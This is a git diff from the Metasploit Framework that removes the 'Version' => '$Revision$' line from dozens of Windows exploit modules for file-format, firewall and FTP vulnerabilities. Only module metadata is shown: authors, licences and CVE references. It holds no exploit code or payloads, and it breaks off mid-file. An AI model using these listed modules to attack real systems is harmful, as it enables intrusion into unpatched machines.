62212bff49..95496d38c2 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '38436' ], diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index 2a411c6242..3933d96644 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3214' ], diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 2fb6a083f4..5d8add038b 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'C4SS!0 G0M3S', # Vulnerability discovery and original exploit 'TecR0c ', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '46059' ], diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 062ca5ee5c..e584604a76 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3861' ], diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 5cd2a36269..f77c640060 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6898' ], diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 847187ed5f..a6284944a8 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'mr_me ', # found + msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-4535' ], diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index dd15a9fbcf..cb9dec4e1b 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rick2600', # Original Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64368' ], diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index a31debb94b..0beb3762c7 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Brandon Murphy', #Initial discovery, poc diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index bd4719a344..7e69975853 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49371' ], diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 9b1c84afe0..f5f9ab29da 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1260' ], diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index 1653e972d6..04c431c2cf 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'n00b', # original discovery 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2888' ], diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index cd67978146..49e415f40a 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0308' ], diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index 375aeea09c..c4634e6767 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # cleanup pass 1 & second offset 'jduck' # cleanup pass 2 & combined offsets ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63067' ], diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index 278ead8e6c..6bff61b596 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4654' ], diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index bd719b081e..ff056c214c 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Acidgen', #found the vulnerability 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0499'], diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 50128d1455..d2b15fc149 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Shahin Ramezany ', # MOAUB #8 exploit and binary analysis 'juan vazquez', # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2010-1681' ], diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index f29d7ee608..26c30ebf60 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # original discovery & msf exploit 'TecR0c ' # msf exploit ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2386' ], diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index abbf9e8449..fbd1812f92 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1574' ], diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 7cec8a7364..29c34b6aac 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD', # Exploit 'juan vazquez' # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49809' ], diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 1d536790bc..5afb287f1f 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '35500' ], diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index 7f8dceb0fc..975c42c582 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '70698' ], diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 3eb4d69ca6..dd1281cb9a 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64581'], diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index 4dfc2ffca1..9288e1253f 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6251' ], diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index ae165c92bc..e640d3444a 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sickness', #proof of concept 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1591'], diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 3e72999dd0..47e2aab926 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'fdisk', # Original Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66911'], diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index 9a793d73f9..d73dd2c758 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'loneferret', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '57162' ], diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index ce274e3f22..1b96e69912 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote structured exception handler record. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'hadji samir ', # Discovered the bug diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index b6ddfbd1d7..a5dfaef02e 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0964' ], diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 1efc36d0e4..8d387fc183 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0362'], diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index fb163a0d9a..32478da6bf 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0220'], diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index edd397cbb5..99217202b7 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # helped writing this module ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index f24449e482..bcc6c0e02c 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'otr' # Windows XP SP3 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0277'], diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 62faedfa03..5a98653706 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', #found bug and wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 738900a9fa..01808aba44 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2961'], diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index a8624480c9..ab84ee523e 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # When a DoS is NOT a DoS diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index b5b9154d86..cd636cae98 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2074'], diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 4b1e315c97..7a57f1b24f 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3952' ], diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 6475b0aeb7..125e27e1bb 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # various fixes, remove most hardcoded addresses ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 85295922e8..0f96e523ef 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 7dfee14ca2..3dfa8447eb 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 983dbcd7bc..c5cb6daa18 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3726' ], diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 0eb509b32b..332928ee57 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index a03efe77ec..1e4513fbaa 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3683'], diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index c36fcae995..39a72696ab 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68638'], diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index 48976091a6..3f7c3ba179 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index d1c4b86fda..a8f5092563 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' #found bug, wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68639'], diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 909af837bf..14c83a9acb 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' #wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index e2554a11bb..51e50ec426 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68641'], diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 701c39e932..473e949ac2 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1415'], diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index 8af478c0bd..0f049517ff 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Joff Thyer ', #Improved msf version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6576'], diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 2b30e6b992..16907d90f9 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4769' ], diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index d9a96f6714..d760df57c7 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'nullthreat' # Ported PoC to MSF ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68640'], diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 81f0ffdc55..0b350bde84 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0558' ], diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 1b6aea5568..b26e572e18 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Kingcope ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['EDB', '9541'], diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 4843ba5153..e6bfa84d5d 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1323'], diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 2cb35e6a5b..d9e04da195 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', #wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68824' ], diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index a528833009..43fcbf0041 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0727'], diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 5f8e891837..863a0a5839 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'David Litchfield ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'References' => [ diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 74fc43382b..68791b8c29 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ 